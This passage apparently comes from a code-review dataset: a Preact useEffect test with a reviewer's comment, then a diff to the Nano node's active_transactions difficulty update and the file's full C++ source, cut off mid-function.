scheduleEffectAssert(() => { expect(cleanupFunction).to.not.be.called; expect(callback).to.not.be.called; }); }); it('Should execute effects in the right order', () => { let executionOrder = []; const App = ({ i }) => { executionOrder = []; useEffect(() => { executionOrder.push('action1'); return () => executionOrder.push('cleanup1'); }, [i]); useEffect(() => { executionOrder.push('action2'); return () => executionOrder.push('cleanup2'); }, [i]); return <p>Test</p>; }; act(() => render(<App i={0} />, scratch)); act(() => render(<App i={2} />, scratch)); expect(executionOrder).to.deep.equal(['cleanup1', 'cleanup2', 'action1', 'action2']); }); });
1
14,278
I'm honestly scared because act is now a hard requirement for useEffect which it wasn't before... This could break some tests :(
preactjs-preact
js
@@ -632,8 +632,13 @@ void nano::active_transactions::update_difficulty (std::shared_ptr<nano::block> { node.logger.try_log (boost::str (boost::format ("Block %1% was updated from difficulty %2% to %3%") % block_a->hash ().to_string () % nano::to_string_hex (existing_election->difficulty) % nano::to_string_hex (difficulty))); } - roots.get<tag_root> ().modify (existing_election, [difficulty](nano::conflict_info & info_a) { + roots.get<tag_root> ().modify (existing_election, [election = existing_election->election, &block_a, difficulty](nano::conflict_info & info_a) { info_a.difficulty = difficulty; + election->blocks[block_a->hash ()] = block_a; + if (election->status.winner->hash () == block_a->hash ()) + { + election->status.winner = block_a; + } }); adjust_difficulty (block_a->hash ()); }
1
#include <nano/lib/threading.hpp> #include <nano/node/active_transactions.hpp> #include <nano/node/election.hpp> #include <nano/node/node.hpp> #include <boost/format.hpp> #include <boost/variant/get.hpp> #include <numeric> using namespace std::chrono; nano::active_transactions::active_transactions (nano::node & node_a) : node (node_a), multipliers_cb (20, 1.), trended_active_difficulty (node_a.network_params.network.publish_threshold), solicitor (node_a.network, node_a.network_params.network), next_frontier_check (steady_clock::now ()), long_election_threshold (node_a.network_params.network.is_test_network () ? 2s : 24s), election_request_delay (node_a.network_params.network.is_test_network () ? 0s : 1s), election_time_to_live (node_a.network_params.network.is_test_network () ? 0s : 10s), min_time_between_requests (node_a.network_params.network.is_test_network () ? 25ms : 3s), min_time_between_floods (node_a.network_params.network.is_test_network () ? 50ms : 6s), min_request_count_flood (node_a.network_params.network.is_test_network () ? 0 : 2), thread ([this]() { nano::thread_role::set (nano::thread_role::name::request_loop); request_loop (); }) { assert (min_time_between_requests > std::chrono::milliseconds (node.network_params.network.request_interval_ms)); assert (min_time_between_floods > std::chrono::milliseconds (node.network_params.network.request_interval_ms)); nano::unique_lock<std::mutex> lock (mutex); condition.wait (lock, [& started = started] { return started; }); } nano::active_transactions::~active_transactions () { stop (); } void nano::active_transactions::search_frontiers (nano::transaction const & transaction_a) { // Limit maximum count of elections to start auto rep_counts (node.wallets.rep_counts ()); bool representative (node.config.enable_voting && rep_counts.voting > 0); bool half_princpal_representative (representative && rep_counts.half_principal > 0); /* Check less frequently for regular nodes in auto mode */ bool agressive_mode (half_princpal_representative || node.config.frontiers_confirmation == nano::frontiers_confirmation_mode::always); auto request_interval (std::chrono::milliseconds (node.network_params.network.request_interval_ms)); auto agressive_factor = request_interval * (agressive_mode ? 20 : 100); // Decrease check time for test network auto is_test_network = node.network_params.network.is_test_network (); int test_network_factor = is_test_network ? 1000 : 1; auto roots_size = size (); nano::unique_lock<std::mutex> lk (mutex); auto check_time_exceeded = std::chrono::steady_clock::now () >= next_frontier_check; lk.unlock (); auto max_elections = (node.config.active_elections_size / 20); auto low_active_elections = roots_size < max_elections; bool wallets_check_required = (!skip_wallets || !priority_wallet_cementable_frontiers.empty ()) && !agressive_mode; // Minimise dropping real-time transactions, set the number of frontiers added to a factor of the total number of active elections auto max_active = node.config.active_elections_size / 5; if (roots_size <= max_active && (check_time_exceeded || wallets_check_required || (!is_test_network && low_active_elections && agressive_mode))) { // When the number of active elections is low increase max number of elections for setting confirmation height. if (max_active > roots_size + max_elections) { max_elections = max_active - roots_size; } // Spend time prioritizing accounts to reduce voting traffic auto time_spent_prioritizing_ledger_accounts = request_interval / 10; auto time_spent_prioritizing_wallet_accounts = request_interval / 25; prioritize_frontiers_for_confirmation (transaction_a, is_test_network ? std::chrono::milliseconds (50) : time_spent_prioritizing_ledger_accounts, time_spent_prioritizing_wallet_accounts); size_t elections_count (0); lk.lock (); auto start_elections_for_prioritized_frontiers = [&transaction_a, &elections_count, max_elections, &lk, &representative, this](prioritize_num_uncemented & cementable_frontiers) { while (!cementable_frontiers.empty () && !this->stopped && elections_count < max_elections) { auto cementable_account_front_it = cementable_frontiers.get<tag_uncemented> ().begin (); auto cementable_account = *cementable_account_front_it; cementable_frontiers.get<tag_uncemented> ().erase (cementable_account_front_it); lk.unlock (); nano::account_info info; auto error = node.store.account_get (transaction_a, cementable_account.account, info); if (!error) { nano::confirmation_height_info confirmation_height_info; error = node.store.confirmation_height_get (transaction_a, cementable_account.account, confirmation_height_info); release_assert (!error); if (info.block_count > confirmation_height_info.height && !this->node.pending_confirmation_height.is_processing_block (info.head)) { auto block (this->node.store.block_get (transaction_a, info.head)); if (!this->start (block, true)) { ++elections_count; // Calculate votes for local representatives if (representative) { this->node.block_processor.generator.add (block->hash ()); } } } } lk.lock (); } }; start_elections_for_prioritized_frontiers (priority_cementable_frontiers); start_elections_for_prioritized_frontiers (priority_wallet_cementable_frontiers); next_frontier_check = steady_clock::now () + (agressive_factor / test_network_factor); } } void nano::active_transactions::post_confirmation_height_set (nano::transaction const & transaction_a, std::shared_ptr<nano::block> block_a, nano::block_sideband const & sideband_a, nano::election_status_type election_status_type_a) { if (election_status_type_a == nano::election_status_type::inactive_confirmation_height) { nano::account account (0); nano::uint128_t amount (0); bool is_state_send (false); nano::account pending_account (0); node.process_confirmed_data (transaction_a, block_a, block_a->hash (), sideband_a, account, amount, is_state_send, pending_account); node.observers.blocks.notify (nano::election_status{ block_a, 0, std::chrono::duration_cast<std::chrono::milliseconds> (std::chrono::system_clock::now ().time_since_epoch ()), std::chrono::duration_values<std::chrono::milliseconds>::zero (), 0, 1, 0, nano::election_status_type::inactive_confirmation_height }, account, amount, is_state_send); } else { auto hash (block_a->hash ()); nano::lock_guard<std::mutex> lock (mutex); auto existing (pending_conf_height.find (hash)); if (existing != pending_conf_height.end ()) { auto election = existing->second; if (election->confirmed && !election->stopped && election->status.winner->hash () == hash) { add_confirmed (existing->second->status, block_a->qualified_root ()); node.receive_confirmed (transaction_a, block_a, hash); nano::account account (0); nano::uint128_t amount (0); bool is_state_send (false); nano::account pending_account (0); node.process_confirmed_data (transaction_a, block_a, hash, sideband_a, account, amount, is_state_send, pending_account); election->status.type = election_status_type_a; election->status.confirmation_request_count = election->confirmation_request_count; node.observers.blocks.notify (election->status, account, amount, is_state_send); if (amount > 0) { node.observers.account_balance.notify (account, false); if (!pending_account.is_zero ()) { node.observers.account_balance.notify (pending_account, true); } } } pending_conf_height.erase (hash); } } } void nano::active_transactions::election_escalate (std::shared_ptr<nano::election> & election_l, nano::transaction const & transaction_l, size_t const & roots_size_l) { constexpr unsigned high_confirmation_request_count{ 128 }; // Log votes for very long unconfirmed elections if (election_l->confirmation_request_count % (4 * high_confirmation_request_count) == 1) { auto tally_l (election_l->tally ()); election_l->log_votes (tally_l); } /* * Escalation for long unconfirmed elections * Start new elections for previous block & source if there are less than 100 active elections */ if (election_l->confirmation_request_count % high_confirmation_request_count == 1 && roots_size_l < 100 && !node.network_params.network.is_test_network ()) { bool escalated_l (false); std::shared_ptr<nano::block> previous_l; auto previous_hash_l (election_l->status.winner->previous ()); if (!previous_hash_l.is_zero ()) { previous_l = node.store.block_get (transaction_l, previous_hash_l); if (previous_l != nullptr && blocks.find (previous_hash_l) == blocks.end () && !node.block_confirmed_or_being_confirmed (transaction_l, previous_hash_l)) { add (std::move (previous_l), true); escalated_l = true; } } /* If previous block not existing/not commited yet, block_source can cause segfault for state blocks So source check can be done only if previous != nullptr or previous is 0 (open account) */ if (previous_hash_l.is_zero () || previous_l != nullptr) { auto source_hash_l (node.ledger.block_source (transaction_l, *election_l->status.winner)); if (!source_hash_l.is_zero () && source_hash_l != previous_hash_l && blocks.find (source_hash_l) == blocks.end ()) { auto source_l (node.store.block_get (transaction_l, source_hash_l)); if (source_l != nullptr && !node.block_confirmed_or_being_confirmed (transaction_l, source_hash_l)) { add (std::move (source_l), true); escalated_l = true; } } } if (escalated_l) { election_l->update_dependent (); } } } void nano::active_transactions::request_confirm (nano::unique_lock<std::mutex> & lock_a) { assert (!mutex.try_lock ()); auto transaction_l (node.store.tx_begin_read ()); std::unordered_set<nano::qualified_root> inactive_l; /* * Confirm frontiers when there aren't many confirmations already pending and node finished initial bootstrap * In auto mode start confirm only if node contains almost principal representative (half of required for principal weight) */ // Due to the confirmation height processor working asynchronously and compressing several roots into one frontier, probably_unconfirmed_frontiers can be wrong { auto pending_confirmation_height_size (node.pending_confirmation_height.size ()); bool probably_unconfirmed_frontiers (node.ledger.cache.block_count > node.ledger.cache.cemented_count + roots.size () + pending_confirmation_height_size); bool bootstrap_weight_reached (node.ledger.cache.block_count >= node.ledger.bootstrap_weight_max_blocks); if (node.config.frontiers_confirmation != nano::frontiers_confirmation_mode::disabled && bootstrap_weight_reached && probably_unconfirmed_frontiers && pending_confirmation_height_size < confirmed_frontiers_max_pending_cut_off) { lock_a.unlock (); search_frontiers (transaction_l); lock_a.lock (); } } auto const now (std::chrono::steady_clock::now ()); // Any new election started from process_live only gets requests after at least 1 second auto cutoff_l (now - election_request_delay); // Elections taking too long get escalated auto long_election_cutoff_l (now - long_election_threshold); // The lowest PoW difficulty elections have a maximum time to live if they are beyond the soft threshold size for the container auto election_ttl_cutoff_l (now - election_time_to_live); // Rate-limitting floods auto const flood_cutoff (now - min_time_between_floods); // Rate-limitting confirmation requests auto const request_cutoff (now - min_time_between_requests); auto roots_size_l (roots.size ()); auto & sorted_roots_l = roots.get<tag_difficulty> (); size_t count_l{ 0 }; // Only representatives ready to receive batched confirm_req solicitor.prepare (node.rep_crawler.representatives (node.network_params.protocol.tcp_realtime_protocol_version_min)); /* * Loop through active elections in descending order of proof-of-work difficulty, requesting confirmation * * Only up to a certain amount of elections are queued for confirmation request and block rebroadcasting. The remaining elections can still be confirmed if votes arrive * Elections extending the soft config.active_elections_size limit are flushed after a certain time-to-live cutoff * Flushed elections are later re-activated via frontier confirmation */ for (auto i = sorted_roots_l.begin (), n = sorted_roots_l.end (); i != n; ++i, ++count_l) { auto election_l (i->election); auto root_l (i->root); if (election_l->confirmed || (election_l->confirmation_request_count != 0 && !node.ledger.could_fit (transaction_l, *election_l->status.winner))) { election_l->stop (); } // Erase finished elections if ((election_l->stopped)) { inactive_l.insert (root_l); } // Drop elections else if (count_l >= node.config.active_elections_size && election_l->election_start < election_ttl_cutoff_l && !node.wallets.watcher->is_watched (root_l)) { election_l->stop (); inactive_l.insert (root_l); add_dropped_elections_cache (root_l); } // Attempt obtaining votes else if (election_l->skip_delay || election_l->election_start < cutoff_l) { // Broadcast the winner when elections are taking longer to confirm if (election_l->confirmation_request_count >= min_request_count_flood && election_l->last_broadcast < flood_cutoff && !solicitor.broadcast (*election_l)) { election_l->last_broadcast = now; } // Rate-limited requests for confirmation else if (election_l->last_request < request_cutoff && !solicitor.add (*election_l)) { ++election_l->confirmation_request_count; election_l->last_request = now; } // Escalate long election after a certain time and number of requests performed if (election_l->confirmation_request_count > 4 && election_l->election_start < long_election_cutoff_l) { election_escalate (election_l, transaction_l, roots_size_l); } } } lock_a.unlock (); solicitor.flush (); lock_a.lock (); // Erase inactive elections for (auto i (inactive_l.begin ()), n (inactive_l.end ()); i != n; ++i) { auto root_it (roots.get<tag_root> ().find (*i)); if (root_it != roots.get<tag_root> ().end ()) { root_it->election->clear_blocks (); root_it->election->clear_dependent (); roots.get<tag_root> ().erase (root_it); } } } void nano::active_transactions::request_loop () { nano::unique_lock<std::mutex> lock (mutex); started = true; lock.unlock (); condition.notify_all (); // The wallets and active_transactions objects are mutually dependent, so we need a fully // constructed node before proceeding. this->node.node_initialized_latch.wait (); lock.lock (); while (!stopped && !node.flags.disable_request_loop) { // Account for the time spent in request_confirm by defining the wakeup point beforehand const auto wakeup_l (std::chrono::steady_clock::now () + std::chrono::milliseconds (node.network_params.network.request_interval_ms)); update_active_difficulty (lock); request_confirm (lock); // Sleep until all broadcasts are done, plus the remaining loop time if (!stopped) { condition.wait_until (lock, wakeup_l, [&wakeup_l, &stopped = stopped] { return stopped || std::chrono::steady_clock::now () >= wakeup_l; }); } } } void nano::active_transactions::prioritize_account_for_confirmation (nano::active_transactions::prioritize_num_uncemented & cementable_frontiers_a, size_t & cementable_frontiers_size_a, nano::account const & account_a, nano::account_info const & info_a, uint64_t confirmation_height) { if (info_a.block_count > confirmation_height && !node.pending_confirmation_height.is_processing_block (info_a.head)) { auto num_uncemented = info_a.block_count - confirmation_height; nano::lock_guard<std::mutex> guard (mutex); auto it = cementable_frontiers_a.get<tag_account> ().find (account_a); if (it != cementable_frontiers_a.get<tag_account> ().end ()) { if (it->blocks_uncemented != num_uncemented) { // Account already exists and there is now a different uncemented block count so update it in the container cementable_frontiers_a.get<tag_account> ().modify (it, [num_uncemented](nano::cementable_account & info) { info.blocks_uncemented = num_uncemented; }); } } else { assert (cementable_frontiers_size_a <= max_priority_cementable_frontiers); if (cementable_frontiers_size_a == max_priority_cementable_frontiers) { // The maximum amount of frontiers stored has been reached. Check if the current frontier // has more uncemented blocks than the lowest uncemented frontier in the collection if so replace it. auto least_uncemented_frontier_it = cementable_frontiers_a.get<tag_uncemented> ().end (); --least_uncemented_frontier_it; if (num_uncemented > least_uncemented_frontier_it->blocks_uncemented) { cementable_frontiers_a.get<tag_uncemented> ().erase (least_uncemented_frontier_it); cementable_frontiers_a.get<tag_account> ().emplace (account_a, num_uncemented); } } else { cementable_frontiers_a.get<tag_account> ().emplace (account_a, num_uncemented); } } cementable_frontiers_size_a = cementable_frontiers_a.size (); } } void nano::active_transactions::prioritize_frontiers_for_confirmation (nano::transaction const & transaction_a, std::chrono::milliseconds ledger_accounts_time_a, std::chrono::milliseconds wallet_account_time_a) { // Don't try to prioritize when there are a large number of pending confirmation heights as blocks can be cemented in the meantime, making the prioritization less reliable if (node.pending_confirmation_height.size () < confirmed_frontiers_max_pending_cut_off) { size_t priority_cementable_frontiers_size; size_t priority_wallet_cementable_frontiers_size; { nano::lock_guard<std::mutex> guard (mutex); priority_cementable_frontiers_size = priority_cementable_frontiers.size (); priority_wallet_cementable_frontiers_size = priority_wallet_cementable_frontiers.size (); } nano::timer<std::chrono::milliseconds> wallet_account_timer; wallet_account_timer.start (); if (!skip_wallets) { // Prioritize wallet accounts first { nano::lock_guard<std::mutex> lock (node.wallets.mutex); auto wallet_transaction (node.wallets.tx_begin_read ()); auto const & items = node.wallets.items; if (items.empty ()) { skip_wallets = true; } for (auto item_it = items.cbegin (); item_it != items.cend (); ++item_it) { // Skip this wallet if it has been traversed already while there are others still awaiting if (wallet_ids_already_iterated.find (item_it->first) != wallet_ids_already_iterated.end ()) { continue; } nano::account_info info; auto & wallet (item_it->second); nano::lock_guard<std::recursive_mutex> wallet_lock (wallet->store.mutex); auto & next_wallet_frontier_account = next_wallet_id_accounts.emplace (item_it->first, wallet_store::special_count).first->second; auto i (wallet->store.begin (wallet_transaction, next_wallet_frontier_account)); auto n (wallet->store.end ()); nano::confirmation_height_info confirmation_height_info; for (; i != n; ++i) { auto const & account (i->first); if (!node.store.account_get (transaction_a, account, info) && !node.store.confirmation_height_get (transaction_a, account, confirmation_height_info)) { // If it exists in normal priority collection delete from there. auto it = priority_cementable_frontiers.find (account); if (it != priority_cementable_frontiers.end ()) { nano::lock_guard<std::mutex> guard (mutex); priority_cementable_frontiers.erase (it); priority_cementable_frontiers_size = priority_cementable_frontiers.size (); } prioritize_account_for_confirmation (priority_wallet_cementable_frontiers, priority_wallet_cementable_frontiers_size, account, info, confirmation_height_info.height); if (wallet_account_timer.since_start () >= wallet_account_time_a) { break; } } next_wallet_frontier_account = account.number () + 1; } // Go back to the beginning when we have reached the end of the wallet accounts for this wallet if (i == n) { wallet_ids_already_iterated.emplace (item_it->first); next_wallet_id_accounts.at (item_it->first) = wallet_store::special_count; // Skip wallet accounts when they have all been traversed if (std::next (item_it) == items.cend ()) { wallet_ids_already_iterated.clear (); skip_wallets = true; } } } } } nano::timer<std::chrono::milliseconds> timer; timer.start (); auto i (node.store.latest_begin (transaction_a, next_frontier_account)); auto n (node.store.latest_end ()); nano::confirmation_height_info confirmation_height_info; for (; i != n && !stopped; ++i) { auto const & account (i->first); auto const & info (i->second); if (priority_wallet_cementable_frontiers.find (account) == priority_wallet_cementable_frontiers.end ()) { if (!node.store.confirmation_height_get (transaction_a, account, confirmation_height_info)) { prioritize_account_for_confirmation (priority_cementable_frontiers, priority_cementable_frontiers_size, account, info, confirmation_height_info.height); } } next_frontier_account = account.number () + 1; if (timer.since_start () >= ledger_accounts_time_a) { break; } } // Go back to the beginning when we have reached the end of the accounts and start with wallet accounts next time if (i == n) { next_frontier_account = 0; skip_wallets = false; } } } void nano::active_transactions::stop () { nano::unique_lock<std::mutex> lock (mutex); if (!started) { condition.wait (lock, [& started = started] { return started; }); } stopped = true; lock.unlock (); condition.notify_all (); if (thread.joinable ()) { thread.join (); } lock.lock (); roots.clear (); } bool nano::active_transactions::start (std::shared_ptr<nano::block> block_a, bool const skip_delay_a, std::function<void(std::shared_ptr<nano::block>)> const & confirmation_action_a) { nano::lock_guard<std::mutex> lock (mutex); return add (block_a, skip_delay_a, confirmation_action_a); } bool nano::active_transactions::add (std::shared_ptr<nano::block> block_a, bool const skip_delay_a, std::function<void(std::shared_ptr<nano::block>)> const & confirmation_action_a) { auto error (true); if (!stopped) { auto root (block_a->qualified_root ()); auto existing (roots.get<tag_root> ().find (root)); if (existing == roots.get<tag_root> ().end () && confirmed_set.get<tag_root> ().find (root) == confirmed_set.get<tag_root> ().end ()) { auto hash (block_a->hash ()); auto election (nano::make_shared<nano::election> (node, block_a, skip_delay_a, confirmation_action_a)); uint64_t difficulty (0); error = nano::work_validate (*block_a, &difficulty); release_assert (!error); roots.get<tag_root> ().emplace (nano::conflict_info{ root, difficulty, difficulty, election }); blocks.emplace (hash, election); adjust_difficulty (hash); election->insert_inactive_votes_cache (hash); } } return error; } // Validate a vote and apply it to the current election if one exists nano::vote_code nano::active_transactions::vote (std::shared_ptr<nano::vote> vote_a) { // If none of the hashes are active, it is unknown whether it's a replay // In this case, votes are also not republished bool at_least_one (false); bool replay (false); bool processed (false); { nano::lock_guard<std::mutex> lock (mutex); for (auto vote_block : vote_a->blocks) { nano::election_vote_result result; if (vote_block.which ()) { auto block_hash (boost::get<nano::block_hash> (vote_block)); auto existing (blocks.find (block_hash)); if (existing != blocks.end ()) { at_least_one = true; result = existing->second->vote (vote_a->account, vote_a->sequence, block_hash); } else // possibly a vote for a recently confirmed election { add_inactive_votes_cache (block_hash, vote_a->account); } } else { auto block (boost::get<std::shared_ptr<nano::block>> (vote_block)); auto existing (roots.get<tag_root> ().find (block->qualified_root ())); if (existing != roots.get<tag_root> ().end ()) { at_least_one = true; result = existing->election->vote (vote_a->account, vote_a->sequence, block->hash ()); } else { add_inactive_votes_cache (block->hash (), vote_a->account); } } processed = processed || result.processed; replay = replay || result.replay; } } if (at_least_one) { if (processed) { node.network.flood_vote (vote_a); } return replay ? nano::vote_code::replay : nano::vote_code::vote; } else { return nano::vote_code::indeterminate; } } bool nano::active_transactions::active (nano::qualified_root const & root_a) { nano::lock_guard<std::mutex> lock (mutex); return roots.get<tag_root> ().find (root_a) != roots.get<tag_root> ().end (); } bool nano::active_transactions::active (nano::block const & block_a) { return active (block_a.qualified_root ()); } void nano::active_transactions::update_difficulty (std::shared_ptr<nano::block> block_a, boost::optional<nano::write_transaction const &> opt_transaction_a) { nano::unique_lock<std::mutex> lock (mutex); auto existing_election (roots.get<tag_root> ().find (block_a->qualified_root ())); if (existing_election != roots.get<tag_root> ().end ()) { uint64_t difficulty; auto error (nano::work_validate (*block_a, &difficulty)); (void)error; assert (!error); if (difficulty > existing_election->difficulty) { if (node.config.logging.active_update_logging ()) { node.logger.try_log (boost::str (boost::format ("Block %1% was updated from difficulty %2% to %3%") % block_a->hash ().to_string () % nano::to_string_hex (existing_election->difficulty) % nano::to_string_hex (difficulty))); } roots.get<tag_root> ().modify (existing_election, [difficulty](nano::conflict_info & info_a) { info_a.difficulty = difficulty; }); adjust_difficulty (block_a->hash ()); } } else if (opt_transaction_a.is_initialized ()) { // Only guaranteed to immediately restart the election if the new block is received within 60s of dropping it constexpr std::chrono::seconds recently_dropped_cutoff{ 60s }; if (find_dropped_elections_cache (block_a->qualified_root ()) > std::chrono::steady_clock::now () - recently_dropped_cutoff) { lock.unlock (); nano::block_sideband existing_sideband; auto hash (block_a->hash ()); auto existing_block (node.store.block_get (*opt_transaction_a, hash, &existing_sideband)); release_assert (existing_block != nullptr); nano::confirmation_height_info confirmation_height_info; release_assert (!node.store.confirmation_height_get (*opt_transaction_a, node.store.block_account (*opt_transaction_a, hash), confirmation_height_info)); bool confirmed = (confirmation_height_info.height >= existing_sideband.height); if (!confirmed && existing_block->block_work () != block_a->block_work ()) { uint64_t existing_difficulty; uint64_t new_difficulty; if (!nano::work_validate (*block_a, &new_difficulty) && !nano::work_validate (*existing_block, &existing_difficulty)) { if (new_difficulty > existing_difficulty) { // Re-writing the block is necessary to avoid the same work being received later to force restarting the election // The existing block is re-written, not the arriving block, as that one might not have gone through a full signature check existing_block->block_work_set (block_a->block_work ()); node.store.block_put (*opt_transaction_a, hash, *existing_block, existing_sideband); // Restart election for the upgraded block, previously dropped from elections lock.lock (); add (existing_block); } } } } } } void nano::active_transactions::adjust_difficulty (nano::block_hash const & hash_a) { assert (!mutex.try_lock ()); std::deque<std::pair<nano::block_hash, int64_t>> remaining_blocks; remaining_blocks.emplace_back (hash_a, 0); std::unordered_set<nano::block_hash> processed_blocks; std::vector<std::pair<nano::qualified_root, int64_t>> elections_list; double sum (0.); int64_t highest_level (0); int64_t lowest_level (0); while (!remaining_blocks.empty ()) { auto const & item (remaining_blocks.front ()); auto hash (item.first); auto level (item.second); if (processed_blocks.find (hash) == processed_blocks.end ()) { auto existing (blocks.find (hash)); if (existing != blocks.end () && !existing->second->confirmed && !existing->second->stopped && existing->second->status.winner->hash () == hash) { auto previous (existing->second->status.winner->previous ()); if (!previous.is_zero ()) { remaining_blocks.emplace_back (previous, level + 1); } auto source (existing->second->status.winner->source ()); if (!source.is_zero () && source != previous) { remaining_blocks.emplace_back (source, level + 1); } auto link (existing->second->status.winner->link ()); if (!link.is_zero () && !node.ledger.is_epoch_link (link) && link != previous) { remaining_blocks.emplace_back (link, level + 1); } for (auto & dependent_block : existing->second->dependent_blocks) { remaining_blocks.emplace_back (dependent_block, level - 1); } processed_blocks.insert (hash); nano::qualified_root root (previous, existing->second->status.winner->root ()); auto existing_root (roots.get<tag_root> ().find (root)); if (existing_root != roots.get<tag_root> ().end ()) { sum += nano::difficulty::to_multiplier (existing_root->difficulty, node.network_params.network.publish_threshold); elections_list.emplace_back (root, level); if (level > highest_level) { highest_level = level; } else if (level < lowest_level) { lowest_level = level; } } } } remaining_blocks.pop_front (); } if (!elections_list.empty ()) { double multiplier = sum / elections_list.size (); uint64_t average = nano::difficulty::from_multiplier (multiplier, node.network_params.network.publish_threshold); // Prevent overflow int64_t limiter (0); if (std::numeric_limits<std::uint64_t>::max () - average < static_cast<uint64_t> (highest_level)) { // Highest adjusted difficulty value should be std::numeric_limits<std::uint64_t>::max () limiter = std::numeric_limits<std::uint64_t>::max () - average + highest_level; assert (std::numeric_limits<std::uint64_t>::max () == average + highest_level - limiter); } else if (average < std::numeric_limits<std::uint64_t>::min () - lowest_level) { // Lowest adjusted difficulty value should be std::numeric_limits<std::uint64_t>::min () limiter = std::numeric_limits<std::uint64_t>::min () - average + lowest_level; assert (std::numeric_limits<std::uint64_t>::min () == average + lowest_level - limiter); } // Set adjusted difficulty for (auto & item : elections_list) { auto existing_root (roots.get<tag_root> ().find (item.first)); uint64_t difficulty_a = average + item.second - limiter; roots.get<tag_root> ().modify (existing_root, [difficulty_a](nano::conflict_info & info_a) { info_a.adjusted_difficulty = difficulty_a; }); } } } void nano::active_transactions::update_active_difficulty (nano::unique_lock<std::mutex> & lock_a) { assert (!mutex.try_lock ()); double multiplier (1.); if (!roots.empty ()) { auto & sorted_roots = roots.get<tag_difficulty> (); std::vector<uint64_t> active_root_difficulties; active_root_difficulties.reserve (std::min (sorted_roots.size (), node.config.active_elections_size)); size_t count (0); auto cutoff (std::chrono::steady_clock::now () - election_request_delay - 1s); for (auto it (sorted_roots.begin ()), end (sorted_roots.end ()); it != end && count++ < node.config.active_elections_size; ++it) { if (!it->election->confirmed && !it->election->stopped && it->election->election_start < cutoff) { active_root_difficulties.push_back (it->adjusted_difficulty); } } if (active_root_difficulties.size () > 10 || (!active_root_difficulties.empty () && node.network_params.network.is_test_network ())) { multiplier = nano::difficulty::to_multiplier (active_root_difficulties[active_root_difficulties.size () / 2], node.network_params.network.publish_threshold); } } assert (multiplier >= 1); multipliers_cb.push_front (multiplier); auto sum (std::accumulate (multipliers_cb.begin (), multipliers_cb.end (), double(0))); auto difficulty = nano::difficulty::from_multiplier (sum / multipliers_cb.size (), node.network_params.network.publish_threshold); assert (difficulty >= node.network_params.network.publish_threshold); trended_active_difficulty = difficulty; node.observers.difficulty.notify (trended_active_difficulty); } uint64_t nano::active_transactions::active_difficulty () { nano::lock_guard<std::mutex> lock (mutex); return trended_active_difficulty; } uint64_t nano::active_transactions::limited_active_difficulty () { return std::min (active_difficulty (), node.config.max_work_generate_difficulty); } // List of active blocks in elections std::deque<std::shared_ptr<nano::block>> nano::active_transactions::list_blocks () { std::deque<std::shared_ptr<nano::block>> result; nano::lock_guard<std::mutex> lock (mutex); for (auto & root : roots) { result.push_back (root.election->status.winner); } return result; } std::deque<nano::election_status> nano::active_transactions::list_confirmed () { nano::lock_guard<std::mutex> lock (mutex); return confirmed; } void nano::active_transactions::add_confirmed (nano::election_status const & status_a, nano::qualified_root const & root_a) { confirmed.push_back (status_a); auto inserted (confirmed_set.get<tag_sequence> ().push_back (root_a)); if (confirmed.size () > node.config.confirmation_history_size) { confirmed.pop_front (); if (inserted.second) { confirmed_set.get<tag_sequence> ().pop_front (); } } } void nano::active_transactions::erase (nano::block const & block_a) { nano::lock_guard<std::mutex> lock (mutex); auto root_it (roots.get<tag_root> ().find (block_a.qualified_root ())); if (root_it != roots.get<tag_root> ().end ()) { root_it->election->stop (); root_it->election->clear_blocks (); root_it->election->clear_dependent (); roots.get<tag_root> ().erase (root_it); node.logger.try_log (boost::str (boost::format ("Election erased for block block %1% root %2%") % block_a.hash ().to_string () % block_a.root ().to_string ())); } } bool nano::active_transactions::empty () { nano::lock_guard<std::mutex> lock (mutex); return roots.empty (); } size_t nano::active_transactions::size () { nano::lock_guard<std::mutex> lock (mutex); return roots.size (); } bool nano::active_transactions::publish (std::shared_ptr<nano::block> block_a) { nano::lock_guard<std::mutex> lock (mutex); auto existing (roots.get<tag_root> ().find (block_a->qualified_root ())); auto result (true); if (existing != roots.get<tag_root> ().end ()) { auto election (existing->election); result = election->publish (block_a); if (!result && !election->confirmed) { blocks.emplace (block_a->hash (), election); } } return result; } void nano::active_transactions::clear_block (nano::block_hash const & hash_a) { nano::lock_guard<std::mutex> guard (mutex); pending_conf_height.erase (hash_a); } // Returns the type of election status requiring callbacks calling later boost::optional<nano::election_status_type> nano::active_transactions::confirm_block (nano::transaction const & transaction_a, std::shared_ptr<nano::block> block_a) { auto hash (block_a->hash ()); nano::unique_lock<std::mutex> lock (mutex); auto existing (blocks.find (hash)); if (existing != blocks.end ()) { if (!existing->second->confirmed && !existing->second->stopped && existing->second->status.winner->hash () == hash) { existing->second->confirm_once (nano::election_status_type::active_confirmation_height); return nano::election_status_type::active_confirmation_height; } else { return boost::optional<nano::election_status_type>{}; } } else { return nano::election_status_type::inactive_confirmation_height; } } size_t nano::active_transactions::priority_cementable_frontiers_size () { nano::lock_guard<std::mutex> guard (mutex); return priority_cementable_frontiers.size (); } size_t nano::active_transactions::priority_wallet_cementable_frontiers_size () { nano::lock_guard<std::mutex> guard (mutex); return priority_wallet_cementable_frontiers.size (); } boost::circular_buffer<double> nano::active_transactions::difficulty_trend () { nano::lock_guard<std::mutex> guard (mutex); return multipliers_cb; } size_t nano::active_transactions::inactive_votes_cache_size () { nano::lock_guard<std::mutex> guard (mutex); return inactive_votes_cache.size (); } void nano::active_transactions::add_inactive_votes_cache (nano::block_hash const & hash_a, nano::account const & representative_a) { // Check principal representative status if (node.ledger.weight (representative_a) > node.minimum_principal_weight ()) { auto existing (inactive_votes_cache.get<nano::gap_cache::tag_hash> ().find (hash_a)); if (existing != inactive_votes_cache.get<nano::gap_cache::tag_hash> ().end () && !existing->confirmed) { auto is_new (false); inactive_votes_cache.get<nano::gap_cache::tag_hash> ().modify (existing, [representative_a, &is_new](nano::gap_information & info) { auto it = std::find (info.voters.begin (), info.voters.end (), representative_a); is_new = (it == info.voters.end ()); if (is_new) { info.arrival = std::chrono::steady_clock::now (); info.voters.push_back (representative_a); } }); if (is_new) { if (node.gap_cache.bootstrap_check (existing->voters, hash_a)) { inactive_votes_cache.get<nano::gap_cache::tag_hash> ().modify (existing, [](nano::gap_information & info) { info.confirmed = true; }); } } } else { inactive_votes_cache.get<nano::gap_cache::tag_arrival> ().emplace (nano::gap_information{ std::chrono::steady_clock::now (), hash_a, std::vector<nano::account> (1, representative_a) }); if (inactive_votes_cache.size () > inactive_votes_cache_max) { inactive_votes_cache.get<nano::gap_cache::tag_arrival> ().erase (inactive_votes_cache.get<nano::gap_cache::tag_arrival> ().begin ()); } } } } nano::gap_information nano::active_transactions::find_inactive_votes_cache (nano::block_hash 